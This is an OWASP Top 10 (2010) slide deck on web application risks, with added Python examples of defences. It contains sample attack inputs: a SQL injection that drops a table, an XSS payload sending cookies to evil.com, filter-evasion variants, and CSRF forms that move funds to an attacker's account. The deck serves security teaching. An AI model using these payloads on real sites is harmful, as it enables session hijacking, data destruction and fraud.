![Page 1: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/1.jpg)
OWASP
OWASP Top 10 - Agenda
- Background
- Risk based
- Top 10 items 1 – 6
- Live demo
- Top 10 items 7 – 10
- OWASP resources
The OWASP Guide
Risk rating factors used to rank the Top 10 (threat agent and business impact are marked "?" because they depend on the application):

| Threat Agent | Attack Vector | Weakness Prevalence | Weakness Detectability | Technical Impact | Business Impact |
|---|---|---|---|---|---|
| ? | Easy | Widespread | Easy | Severe | ? |
| ? | Average | Common | Average | Moderate | ? |
| ? | Difficult | Uncommon | Difficult | Minor | ? |
Warning
- Risk analysis / Insiders
- Architecture: Modular, Clarity
- SDLC: Knowledge, Predictability
Top 10 - 2010
1. Injection
2. Cross site scripting (XSS)
3. Broken authentication and session management
4. Insecure direct object reference
5. Cross site request forgery (CSRF)
6. Security misconfiguration
7. Insecure cryptographic storage
8. Failure to restrict URL access
9. Insufficient transport layer protection
10. Unvalidated redirects and forwards
A1 – Injection
(Diagram: Client → Application → DB / Shell / Program / CPU. Injection reaches any interpreter that the application hands untrusted input to, not only SQL.)
A1 – Injection
Vulnerable code: the request parameter is concatenated straight into the SQL text.

```java
String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") +"'";
```

With benign input the query is what the developer expected:

```
id="foo"
SELECT * FROM accnts WHERE ID='foo';
```

With a crafted value the quote closes the string literal, the rest of the input is executed as SQL (here a stacked statement dropping the table), and the trailing -- comments out the dangling quote:

```
id="foo';DROP accnts;--"
SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';
```
A2 - Cross site scripting (XSS)
(Diagram: attacker's browser → Application / DB → victim's browser. The script is stored or reflected by the application and runs in the victim's browser.)
A2 - Cross site scripting (XSS)
Vulnerable code: the parameter is written into an HTML attribute without output encoding.

```java
(String) page += "<input name='cc' type='TEXT' value='" + request.getParameter("CC") + "'>";
```

Benign input:

```
CC=123456789
<input name='cc' type='TEXT' value='123456789'>
```

Crafted input: the single quote closes the attribute, the > closes the tag, and the injected script sends the victim's cookie to the attacker:

```
CC=123456789'><script>window.location='http://evil.com/?x='+document.cookie</script>
<input name='cc' type='TEXT' value='123456789'><script>window.location='http://evil.com/?x='+document.cookie</script>'>
```
A2 - Cross site scripting (XSS)
Filter evasion: blacklisting the literal "<script>" is not enough, because the same character or tag can be written in many ways:

- alternative encodings of <: \x3c, \x3C, \u003c, \u003C, %3C, and HTML entities that render as <
- other tags with event handlers instead of <script>: <img src=http://site.com onmouseover=, <body onload=
- mixed case and script in a URL attribute: <IMG SRC=jAvascript:alert('test2')>
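An added example, not from the slides, covering both A2 slides above: the attribute rendering is reproduced in Python, once unchanged, once behind a naive "<script>" blacklist, and once with context-appropriate output encoding (html.escape with quote=True). The payloads are constructed from the slide's evasion list; breaks_out() counts tag openers in the rendered HTML, so a second one means the value escaped the value='...' context.

```python
import html
import re


def render_vulnerable(cc: str) -> str:
    # Mirrors the slide: the parameter is pasted into an HTML attribute unchanged.
    return "<input name='cc' type='TEXT' value='" + cc + "'>"


def render_blacklisted(cc: str) -> str:
    # A typical "fix" the slide's evasion list defeats: strip the literal
    # <script> tag and hope. Case variants, other tags and event handlers pass.
    cleaned = cc.replace("<script>", "").replace("</script>", "")
    return "<input name='cc' type='TEXT' value='" + cleaned + "'>"


def render_safe(cc: str) -> str:
    # Output encoding for the attribute context. quote=True also encodes ' and ",
    # so the value can neither close the attribute nor open a new tag.
    return "<input name='cc' type='TEXT' value='" + html.escape(cc, quote=True) + "'>"


# Constructed payloads built from the slide's examples. Each begins with a
# quote and > to break out of value='...'.
PAYLOADS = {
    "script_tag": "123456789'><script>window.location='http://evil.com/?x='+document.cookie</script>",
    "mixed_case_script": "123456789'><ScRiPt>alert(1)</ScRiPt>",
    "event_handler": "123456789'><body onload=alert(1)>",
    "image_pseudo_url": "123456789'><IMG SRC=jAvascript:alert('test2')>",
}

_TAG_OPEN = re.compile(r"<[a-zA-Z]")


def breaks_out(rendered: str) -> bool:
    # The page should contain exactly one tag, the <input>. A second tag opener
    # means the value escaped the attribute context.
    return len(_TAG_OPEN.findall(rendered)) > 1


def evaluate() -> dict:
    return {
        name: {
            "vulnerable": breaks_out(render_vulnerable(p)),
            "blacklist": breaks_out(render_blacklisted(p)),
            "escaped": breaks_out(render_safe(p)),
        }
        for name, p in PAYLOADS.items()
    }


if __name__ == "__main__":
    for name, outcome in evaluate().items():
        print(name, outcome)
```

The blacklist stops only the exact "<script>" payload; every other variant still breaks out, while the encoded output never does, whatever the input contains.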
A3 - Broken authentication and session management
- Unpredictable passwords, session IDs and security questions
- No session IDs or credentials in URLs
- Avoid session fixation
- Session time-out and logout buttons
- Different session IDs outside and inside TLS
- No clear-text passwords
A4 - Insecure direct object references
The form only offers two periods:

```html
<SELECT name=period> <OPTION>2010q1</OPTION> <OPTION>2011q2</OPTION></SELECT>
```

Expected request: period=2011q2

Tampered request: period=2011q3 (a value the form never offered; if the server trusts the parameter, the user reads a report that was not meant for them)
A5 - Cross-site request forgery (CSRF)
A GET request forged with an invisible image:

```html
<img src="http://example.com/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />
```

A POST request forged with a self-submitting form:

```html
<body onload="document.forms[0].submit()">
<form method="POST" action="https://bank.com/fn">
  <input type="hidden" name="sp" value="8109"/>
</form>
```

In both cases the browser attaches the victim's session cookie automatically, so the request looks authenticated.
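An added example (not from the slides) of the standard defence: a per-session anti-CSRF token that the legitimate page embeds as a hidden field and the handler checks before acting. The token is an HMAC of the session id under a server secret, so the attacker's page cannot compute it and a token from the attacker's own session does not verify for the victim's. The handler, the secret and the request bodies are constructed for the example; session_id stands in for the cookie the browser sends automatically.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs

# Per-deployment secret, assumed to live only on the server (constructed here).
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id: str) -> str:
    # Token = HMAC(secret, session id). An attacker's page cannot compute it
    # without the secret, and a token from one session does not verify for
    # another, so it cannot be harvested from the attacker's own account.
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(session_id: str, presented) -> bool:
    if not presented:
        return False
    return hmac.compare_digest(csrf_token(session_id), presented)


def transfer_funds(session_id: str, body: str) -> str:
    # Handler for the slide's transferFunds request. session_id stands for the
    # cookie the browser attaches automatically; that automatic attachment is
    # exactly why the cookie alone cannot prove the user intended the request.
    params = {k: v[0] for k, v in parse_qs(body).items()}
    if not verify_csrf(session_id, params.get("csrf")):
        return "403 missing or invalid CSRF token"
    return "transferred %s to %s" % (params.get("amount"), params.get("destinationAccount"))


def render_form(session_id: str) -> str:
    # The legitimate page embeds the token as a hidden field.
    return ('<form method="POST" action="/transferFunds">'
            '<input type="hidden" name="csrf" value="%s"/></form>' % csrf_token(session_id))


def demo() -> dict:
    victim = "victim-session-id"
    # The slide's auto-submitting form: right cookie, but no token.
    forged = "amount=1500&destinationAccount=attackersAcct"
    # A token the attacker obtained from their own session, replayed against the victim.
    replayed = forged + "&csrf=" + csrf_token("attacker-session-id")
    # A genuine submission from the real page.
    genuine = "amount=20&destinationAccount=savings&csrf=" + csrf_token(victim)
    return {
        "forged": transfer_funds(victim, forged),
        "replayed": transfer_funds(victim, replayed),
        "genuine": transfer_funds(victim, genuine),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result)
```

Because the token is derived from the session id it must be rotated together with the session, and it only helps if the state-changing action is a POST that actually checks it; the GET-via-image case on the slide is fixed by not allowing GET to change state at all.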
A6 - Security misconfiguration
- Patching: OS, application, frameworks / libraries
- Disable unnecessary services
- Stack traces
- Configuration
A7 - Insecure cryptographic storage
- Keep track of sensitive data
- Passwords one-way hashed and salted
- Password / key management
- TLS key pass phrase
- M2M passwords (obfuscation)
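What "one-way hashed and salted" means in practice, as an added example (not from the slides): a per-user random salt plus an iterated key-derivation function (PBKDF2-HMAC-SHA256 from the standard library) is compared against a plain SHA-256 of the password. The iteration count and the sample password are assumed values chosen for the example; the stored string carries algorithm, iterations and salt so any of them can be raised later without breaking verification.

```python
import base64
import hashlib
import hmac
import os

# PBKDF2-HMAC-SHA256 work factor; assumed value, tune it to your hardware.
ITERATIONS = 600_000


def naive_hash(password: str) -> str:
    # What "hashed" too often means: one fast, unsalted SHA-256. Equal
    # passwords give equal hashes and precomputed tables crack them offline.
    return hashlib.sha256(password.encode()).hexdigest()


def hash_password(password: str, salt: bytes = None) -> str:
    # Per-user random salt plus a slow, iterated hash. The stored string carries
    # algorithm, iteration count and salt so each can be changed later.
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS,
        base64.b64encode(salt).decode(),
        base64.b64encode(dk).decode(),
    )


def verify_password(password: str, stored: str) -> bool:
    algo, iterations, salt_b64, dk_b64 = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(dk_b64)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iterations))
    # Constant-time comparison: a plain == leaks how many leading bytes matched.
    return hmac.compare_digest(dk, expected)


def demo() -> dict:
    # Two users who chose the same (constructed) password.
    pw = "correct horse battery staple"
    stored_alice = hash_password(pw)
    stored_bob = hash_password(pw)
    return {
        "naive_identical": naive_hash(pw) == naive_hash(pw),
        "salted_identical": stored_alice == stored_bob,
        "alice_ok": verify_password(pw, stored_alice),
        "alice_wrong": verify_password("wrong", stored_alice),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name + ":", value)
```

The two salted records differ even though the passwords are equal, so a cracked record reveals nothing about other users, and every guess costs the attacker the full iteration count.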
A8 - Failure to restrict URL access
/user/getAccounts
/admin/getAccounts

Leaving the admin URL out of the menu does not protect it; anyone who guesses the path reaches it unless the server checks the caller's role on every request.
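Added example (not from the slides) covering both A8 above and A4 earlier: the two URLs from this slide are authorised per function by a role table that denies anything it does not list, and the report period from the A4 slide is then authorised per object against what the user is entitled to. The User class, roles and period sets are constructed for the example.

```python
from dataclasses import dataclass, field


@dataclass
class User:
    name: str
    roles: set = field(default_factory=set)
    periods: set = field(default_factory=set)  # report periods this user may open


class Forbidden(Exception):
    pass


# A8, function-level: every URL declares the role it needs. The lookup fails
# closed: a URL missing from the table is denied, so a forgotten admin page
# is not exposed just because nobody linked to it.
ROUTE_ROLES = {
    "/user/getAccounts": "user",
    "/admin/getAccounts": "admin",
}


def authorize_route(user: User, path: str) -> None:
    required = ROUTE_ROLES.get(path)
    if required is None or required not in user.roles:
        raise Forbidden("%s may not call %s" % (user.name, path))


# A4, object-level: the period parameter comes from the client, so it is
# checked against what this user is entitled to, not against the values the
# <select> happened to offer.
def get_report(user: User, period: str) -> str:
    if period not in user.periods:
        raise Forbidden("%s may not read period %s" % (user.name, period))
    return "report for " + period


def handle(user: User, path: str, period: str) -> str:
    authorize_route(user, path)      # first: may this user call this function at all?
    return get_report(user, period)  # then: may they see this particular object?


def attempt(user: User, path: str, period: str) -> str:
    # Convenience wrapper that turns a Forbidden into a 403-style response.
    try:
        return handle(user, path, period)
    except Forbidden as exc:
        return "403 " + str(exc)


if __name__ == "__main__":
    alice = User("alice", {"user"}, {"2010q1", "2011q2"})
    for path, period in [("/user/getAccounts", "2011q2"),
                         ("/user/getAccounts", "2011q3"),
                         ("/admin/getAccounts", "2011q2")]:
        print(path, period, "->", attempt(alice, path, period))
```

The two checks are different questions and both are needed: a user allowed to call /user/getAccounts is still not allowed to read 2011q3, and an admin-only URL is refused before the object check is even reached.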
A9 - Insufficient transport layer protection
- Use SSL/TLS
- No mixed content
- Use secure cookies

Example: Firesheep exploits poor solutions by sniffing session cookies that sites still send over plain HTTP and replaying them to hijack the session.
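Added example (not from the slides) that ties this slide to A3: a small in-memory session store that issues unguessable ids from the OS random source, replaces the id at login (session fixation), expires idle sessions and invalidates on logout, plus the Set-Cookie line that keeps the id off plain HTTP and away from page script. The store, the idle time-out and the cookie name are assumed for the example; SameSite is a later browser feature not on the 2010 slide, included because it is now part of "secure cookies".

```python
import secrets
import time


class SessionStore:
    # In-memory store constructed for this example; a real one lives server-side
    # in a database or cache. IDLE_TIMEOUT is an assumed policy value.
    IDLE_TIMEOUT = 15 * 60  # seconds

    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions = {}  # session id -> {"user": ..., "last": timestamp}

    def create(self, user=None) -> str:
        # 256 bits from the OS CSPRNG: not guessable, unlike counters,
        # timestamps or hashes of the username.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "last": self._clock()}
        return sid

    def login(self, old_sid: str, user: str) -> str:
        # Session fixation defence: a fresh id is issued at the privilege
        # change, so an id an attacker planted before login never becomes
        # an authenticated session.
        self._sessions.pop(old_sid, None)
        return self.create(user)

    def logout(self, sid: str) -> None:
        # The logout button must invalidate server-side state, not just the cookie.
        self._sessions.pop(sid, None)

    def user_for(self, sid: str):
        # Returns the user bound to the session, or None if unknown or timed out.
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        now = self._clock()
        if now - entry["last"] > self.IDLE_TIMEOUT:
            del self._sessions[sid]
            return None
        entry["last"] = now
        return entry["user"]


def session_cookie(sid: str) -> str:
    # Secure: never sent over plain HTTP, which is what Firesheep sniffed.
    # HttpOnly: not readable by page script, limiting cookie theft via XSS.
    # SameSite=Lax (a later addition, not on the 2010 slide): not sent with
    # cross-site POSTs, which blunts the CSRF forms on the A5 slide.
    return "Set-Cookie: SESSIONID=%s; Path=/; Secure; HttpOnly; SameSite=Lax" % sid


def cookie_weaknesses(set_cookie_header: str) -> list:
    # Audit helper: which of the flags the slide asks for are missing.
    attrs = {part.strip().split("=")[0].lower() for part in set_cookie_header.split(";")[1:]}
    return [flag for flag in ("secure", "httponly", "samesite") if flag not in attrs]


if __name__ == "__main__":
    store = SessionStore()
    anon = store.create()
    authed = store.login(anon, "alice")
    print("planted id still valid after login:", store.user_for(anon) is not None)
    print(session_cookie(authed))
    print("missing flags on a bare cookie:", cookie_weaknesses("Set-Cookie: SESSIONID=abc; Path=/"))
```

Passing a clock into the store is what makes the time-out testable without sleeping; in production the default time.time is used.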
A10 - Unvalidated redirects and forwards
http://www.vuln.com/redir.asp?=http://www.links.com

The target can also be hidden from a casual reader by percent-encoding it; this one decodes to http://www.google.com:

http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D
OWASP resources
- OWASP Secure Software Contract Annex
- OWASP Developer's Guide
- OWASP Enterprise Security API (ESAPI)
- OWASP Software Assurance Maturity Model (SAMM)
- OWASP WebGoat